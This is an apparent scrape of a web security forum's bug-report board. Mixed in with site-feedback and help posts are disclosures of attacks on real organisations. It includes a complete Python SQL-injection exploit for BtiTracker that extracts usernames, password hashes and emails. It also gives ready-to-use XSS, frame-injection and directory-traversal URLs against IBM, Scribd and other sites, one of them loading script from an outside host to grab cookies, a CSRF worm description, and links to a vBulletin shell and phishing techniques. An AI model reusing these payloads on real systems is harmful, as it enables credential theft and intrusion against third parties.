Web Application Security Forum - Bugs

forbes [XSS] (no replies)

longrifle0x — Sun, 15 Jan 2012 11:02:07 -0600

http://search.forbes.com/search/colArchiveSearch?author=">

"Phishing" with Google.com - creating realistic fake webpages (no replies)

TinKode — Mon, 14 Mar 2011 18:21:51 -0500

"Phishing" with Google.com - creating realistic fake webpages

More here: http://tinkode27.baywords.com/phishing-with-google/

Authors: TinKode & Lady Sony@ISR

Bugs in the current version of sla.ckers.org (2 replies)

rsnake — Wed, 19 Jan 2011 13:14:55 -0600

Hey guys, the settings should be identical from the last install we had, so theoretically there should be no new bugs, but I know at least one existed (Thanks to Gareth Heyes for pointing it out). I disabled smilies and auto-linking which appears to have fixed that problem and coincidentally makes the board less annoying, so it's a win win. Let me know if you guys see any other issues pop up.

BtiTracker 1.3.x – 1.4.x Exploit [Python] (no replies)

TinKode — Wed, 09 Jun 2010 19:37:49 -0500

BtiTracker 1.3.x – 1.4.x Exploit

#!/usr/bin/env python# 
################################################################################
# ______           ____                                      __      [ xpl0it ] #
#/\__  _\        /\   _`\                                 __/\ \__              #
#\/_/\ \/     ___\ \,\L\_\     __    ___   __   __  _ __ /\_\ \ ,_\  __  __     #
#   \ \ \   /' _ `\/_\__ \   /'__`\ /'___\/\ \/\  \/\`'__\/\ \ \ \/ /\ \/\ \    #
#    \_\ \__/\ \/\ \/\ \L\ \/\  __//\ \__/\ \  \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \   #
#    /\_____\ \_\ \_\ `\____\ \____\ \____\\  \____/\ \_\  \ \_\ \__\\/`____ \  #
#    \/_____/\/_/\/_/\/_____/\/____/\/____/  \/___/  \/_/   \/_/\/__/ `/___/> \ #
#                                                    _________________   /\___/ #
#                                                    www.insecurity.ro   \/__/  #
#                                                                               # 
################################################################################  
#                    [  BtiTracker 1.3.X - 1.4.X Exploit ]                      # 
#    Greetz: daemien, Sirgod, Puscas_Marin,  AndrewBoy, Ras, HrN, vilches       #
#    Greetz: excess, E.M.I.N.E.M, flo flow,  paxnWo, begood, and ISR Staff      # 
################################################################################  
#                    Because we care, we're security aware                      # 
################################################################################  
 
import sys, urllib2, re
  
if len(sys.argv) < 2:
    print "==============================================================="
    print "============== BtiTracker 1.3.X - 1.4.X Exploit  ==============="
    print "==============================================================="
    print "=               Discovered and coded by  TinKode               ="     
    print "=                      www.InSecurity.ro                       ="
    print "=                                                              ="
    print "= Local  Command:                                              ="
    print "= ./isr.py [http://webshit]  [ID]                              ="
    print "=                                                              ="
    print "==============================================================="
    exit()
  
if len(sys.argv) < 3:
    id = 1
else:
    id = sys.argv[2]
  
shit  = sys.argv[1]
if shit[-1:] != "/":
    shit += "/"
  
url  = shit  + "reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\
concat(0x2d,0x2d,username,0x3a,password,0x3a,email,0x2d,0x2d)\
,5,6,7,8,9,10+from+users+where+ID=" + str(id) +  "--"
print "\n"
print "============================================="
print "=================  InSecurity ================"
print "============================================="
  
html  = urllib2.urlopen(url).read()
slobod =  re.findall(r"--(.*)\:([0-9a-fA-F]{32})\:(.*)--", html)
if  len(slobod)  > 0:
    print "ID       : "  + str(id)
    print "Username : " +  slobod[0][0]
    print "Password : " +  slobod[0][1]
    print "EMail    : " +  slobod[0][2] 
    print "============================================="
    print "================= InSecurity ================"
    print "============================================="
else:
    print "Ai luat-o la gaoaza..."
     
#InSecurity.ro - Romania

Shelling vBulletin All Versions (1 reply)

TinKode — Tue, 10 Aug 2010 22:54:50 -0500

Read here: http://blog.insecurity.ro/shelling-vbulletin-4-0-x-3-8-x-xml/

XML Shell Download: http://www.teamwork.insecurity.ro/xfiles/Shell-vBulletin-.xml.ISR

Thanks, TinKode @ insecurity.ro

xss & dt & frameinj @ ibm (no replies)

hc0de — Wed, 12 May 2010 14:53:46 -0500

hi everybody,
i have found bugs @ ibm aix compiler help pages..

1) frame injection : http://publib.boulder.ibm.com/infocenter/comphelp/v8v101/index.jsp?topic=http://www.google.com

2) xss : http://publib.boulder.ibm.com/infocenter/comphelp/v8v101/index.jsp?topic=../%27%3E%3Cframe%20onLoad=%27alert%28document.cookie%29

3) directory traversal : http://publib.boulder.ibm.com/infocenter/comphelp/v8v101/index.jsp?topic=/../index.jsp

the content.jsp file have this issues..

best regards, hc0de

xss in XX@mail.ru (1 reply)

skruskru — Sun, 18 Apr 2010 03:55:01 -0500

ESET NOD32 Taiwan SQLi (2 replies)

TinKode — Tue, 22 Nov 2011 17:09:09 -0600

More here: http://insecurity.baywords.com/index.php/eset-nod32-taiwan-full-disclosure/

ESET NOD32 Hong Kong (no replies)

TinKode — Sun, 21 Mar 2010 07:08:53 -0500

More here: http://insecurity.baywords.com/index.php/eset-nod32-hong-kong-hacked/

IBM Full Disclosure [Hacked] (2 replies)

TinKode — Tue, 08 Nov 2011 19:20:10 -0600

More here:
http://insecurity.baywords.com/index.php/ibm-full-disclosure-sql-injection/

xss in r00tsecurity.org (no replies)

diamond — Thu, 04 Mar 2010 01:04:27 -0600

interesting :D
www.r00tsecurity.org XSS 2010-02-14

verification link:
http://bugtraq.co.cc/410.bug
http://bugtraq.co.cc/log.php?id=410

a new yahoo mail xss (no replies)

yahooxss2 — Fri, 19 Feb 2010 17:28:57 -0600

I got it from my yahoo inbox.

CNN Oracle SQL Injection (no replies)

TinKode — Wed, 17 Feb 2010 15:41:52 -0600

CNN Oracle SQL Injection

http://isrteam.wordpress.com/2010/02/17/cnn-vulnerable-to-sql-injection/

N.A.S.A Again? (5 replies)

TinKode — Wed, 07 Dec 2011 14:17:17 -0600

http://bit.ly/6VpyNE

vBulletin nulled (validator.php) files/directories disclosure (no replies)

TinKode — Wed, 20 Jan 2010 07:31:21 -0600

*\-----------------------------------------------------------------------------/* 
		       ____        _ _      _   _       (nulled) 
		      |  _ \      | | |    | | (_) 
		__   _| |_) |_   _| | | ___| |_ _ _ __ 
		\ \ / /  _ <| | | | | |/ _ \ __| | '_ \ 
		 \ V /| |_) | |_| | | |  __/ |_| | | | | 
		  \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| 
		                  Full disclosure... 
 
*\-----------------------------------------------------------------------------/*

Name: vBulletin nulled (validator.php) files/directories disclosure
Author: TinKode
Date: 19-01-2010
Dork: "inurl:validator.php"

*\-----------------------------------------------------------------------------/*

Description: With this file you can see all files(.sql - .tar.gz - .zip - .rar - .php - .anything) / directories from the folder with vBulletin i
nstalled...

*\-----------------------------------------------------------------------------/*

Exploit: http://www.website.com/vB_forum/validator.php

*\-----------------------------------------------------------------------------/*

Note: Work on many nulled versions (maybe all)

*\-----------------------------------------------------------------------------/*

Copyrights: http://tinkode.baywords.com

*\-----------------------------------------------------------------------------/*

Greetz: http://www.insecurity.ro, http://www.darkc0de.com

*\-----------------------------------------------------------------------------/*

sla.ckers feature request: entries by time (no replies)

holiman — Fri, 01 Jan 2010 05:58:44 -0600

I ususally check out the rss feed-page to see what is new, and browse through it all to see what is interesting. So far so good. But couldn't you guys put together a page with similar functionality of displaying everything recent that also :
- Shows the names of the authors
- Marks the entries as read
- Can be navigated to see even older messages than just the last X messages

Bug on HDFC Bank has been patched!! (no replies)

brightpixel — Tue, 06 Oct 2009 23:52:44 -0500

Hi Guys,

I have found information leakage on HDFC Bank!!

Here is the link!

http://www.hdfcbank.com/nri/access/instaquery/insta.asp?reg=Dominican%27

MULTIPLE VULNERABILITY(xss,csrf,worm) on www.scribd.com (no replies)

XaDoS — Fri, 18 Sep 2009 15:57:37 -0500

The site http://www.srcibd.com, a network community(che Obama ha usato per la sua campagna elettorale) it's a big community that fight with amazon.com for the 1° most visited site at world. (now scribd have 55 milion of visit evry month)

It's vulnerable to xss, permanent xss, js injection and CSRF
(all DISCOVERED BY ME)

#### XSS:

http://www.scribd.com/my_docs?query=//%3Cfont%20color=%22red%22%3EXADOS%20WAS%20HERE%3C/font%3E%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20By%20XaDoS%3Ch1%3E%3C/marquee%3E%3Cscript%20src=%22http://www.googlebig.com/x.js%22%3E%3C/script%3E

### Permanent XSS:

(after login)
at page http://www.scribd.com/alerts a user can write a new alert, but with malicious js code like:

Name of alert: ">
text of alert: ">

and so post request are like..
Code:



"><script>alert(2)</script>

and there are no token or captcha, so an attaker can write a csrf code like this( working!):
Code:




scribd csrf exploit




    
        
    [MESSAGE]

and trought this csrf can create an xss worm that self
reply trought alerts xss permanet vuln.

have fun.
0-day by XaDoS

possible bug (6 replies)

Albino — Wed, 03 Mar 2010 19:46:28 -0600

It appears to be possible to log in as another user without going through the username/password crap by getting the url 'phorum_session_v5=blablabla' bit correct. I noticed this because I bookmarked a page and it auto-logged me in when I returned to it the next day even though I have a different IP and cookies disabled. Actually I guess it might be a side effect of having cookies disabled. I would have thought the session should have expired or something. Probably not actually a bug or fixworthy but I thought I'd mention it.

a new yahoo mail xss,be patched. (2 replies)

yahooxss — Wed, 02 Sep 2009 12:09:06 -0500

cosine

...

intresting FF bug. (1 reply)

SpoofGhost — Tue, 05 Jan 2010 19:13:14 -0600

there has been found an intresting bug concerning FF i'm not sure if it has already been patched but i doubt it

unicode-overflow

http://packetstormsecurity.org/0907-exploits/firefox35unicode-overflow.txt

Find the Bug: A Book of Incorrect Programs (2 replies)

godzila — Thu, 09 Jul 2009 08:44:00 -0500

50 exercises to help you find bugs faster -- with less aggravation!

Find the Bug: A Book of Incorrect Programs: Bug hunting is" "an art, and you need to be a "master," Get "Find the Bug," and you' ll become one. Long-time Microsoft programmer Adam Barr presents 50 programs, each with exactly one bug. Your assignment: "find it." As you do, Barr will teach you how to " think like your processor" ... anticipating exactly how code will behave, even without running it. You' ll learn better ways to read code, understand it -- and above all, "improve" it.

Read More...

Forum CSS to stop stretching (no replies)

Xeoncross — Mon, 27 Apr 2009 11:29:36 -0500

I was wondering if anyone else uses a large monitor over 1280 or 1440? Because the eye is only designed to read at max 20 words before there should be some kind of wrapping so that the lines of text don't keep going, and going.

Here is an example that would keep this forum from just stretching the text on forever across the screen. 900px or so is generally what is used as the max width of a text area.

.PDDiv { max-width: 900px;}
.StdBlock {padding: 15px;}

Now, I don't assume to know how you guys want your forum setup or styled. But I though I would mention this as reading small 11px font that just keeps stretching across the screen is kind of an eye strain if you have a lot to read.

FYI: This area is for bugs with _this_ site (3 replies)

tx — Sat, 28 Feb 2009 09:46:18 -0600

There's other areas that would be more appropriate for bugs in other sites.

googles coop/cse endless loop (no replies)

backbone — Thu, 26 Feb 2009 02:17:12 -0600

wasn't logged in with the google account and hit the 'manage your existing search engine' link... and found an endless loop...

https://www.google.com/accounts/ServiceLogin?continue=http://www.google.com/coop/manage/cse/&service=cprose&hl=en&passive=true

I wonder why didn't Firefox stop it... (does it happen to others too?)

*update* - it does this even when logged :|
**update** - now everything's back to normal

Unauthorized TinyURL URL Enumeration Vulnerability (2 replies)

Inferno — Fri, 20 Feb 2009 20:16:07 -0600

Some thoughts on TinyURL - http://securethoughts.com/2009/02/unauthorized-tinyurl-url-enumeration-vulnerability/

Breaking Stealth Myth of Desktop Locking Softwares (no replies)

Inferno — Thu, 05 Feb 2009 01:58:44 -0600

This article at my blog might be interesting to some folks, especially ones that use desktop locking softwares such as folder guard, lock folder xp, etc.

http://www.securethoughts.com/2009/02/breaking-the-stealth-myth-of-desktop-locking-softwares/

Drupal, is it a real problem? (1 reply)

dotnet_1 — Fri, 18 Dec 2009 09:57:38 -0600

hi everyone,

yesterday, when i was playiing around some friends website using drupal i've notice the following.
drupal have two options for mapping URL, the first uses the "?q=" in the querystring and the other just append "node" or the page name after the website adress directly.

in the second case iif we type for example http:// drupalsiteexample/someword, the webste will respond that the page doesn't exist and it will show the search page filled with "someword".

but it doesn't end here, it also maps the action of the search form to domething like this action="/someword"

so consider the following url http:// drupalsiteexample/http:// google.com, then the site will claim that google.com doesnt exist but it'll map the action of the search page to http:// google.com. (I tried it and it works).

what if we design a page that looks like a drupal admin page and then added its adress to drupal's URL and instructs sommeone (the admin evidently) to perform a serach...

well am not sure exactly how to implement such an attack, but do u think that such an attack is possible? and if yes, what kind of attack is that? and finally anyone can provide a complete senario of such attacks!!!

thanx very much all.

Any alternative to load function of XML DOM. (4 replies)

shivkumarlal — Tue, 03 Feb 2009 11:22:35 -0600

Hi all,
I am stuck with a problem related to XML DOM . I was trying to parse the RSS feed given by BBC and display the feeds in my webpage thats running on localhost .
This is the code snippet

var xmlDoc=null;
if (window.ActiveXObject)
{// code for IE
xmlDoc=new ActiveXObject("Microsoft.XMLDOM");
}
else if (document.implementation.createDocument)
{// code for Mozilla, Firefox, Opera, etc.
xmlDoc=document.implementation.createDocument("","",null);
}
else
{
alert('Your browser cannot handle this script');
}

if (xmlDoc!=null)
{
xmlDoc.async=false;
xmlDoc.load("http://en-US.fxfeeds.mozilla.com/en-US/firefox/headlines.xml");

}

On doing so I get an error in firebug as "uncaught exception: Permission denied to call method XMLDocument.load" .
I also understand that load() has restrictions that the file that you want to load and the program thats loading it must be on the same server . I want to know is there any alternative to load() that I can use to get things running .

Shivkumar Lal

blocked from ha.ckers.org (10 replies)

ace — Mon, 04 Aug 2008 00:12:43 -0500

hey everyone

I can no longer access ha.ckers.org without proxying. No idea why, my best guess is because lots of people from my ISP show the same ip address it got blocked.

Could you please look into it?

Thanks

ace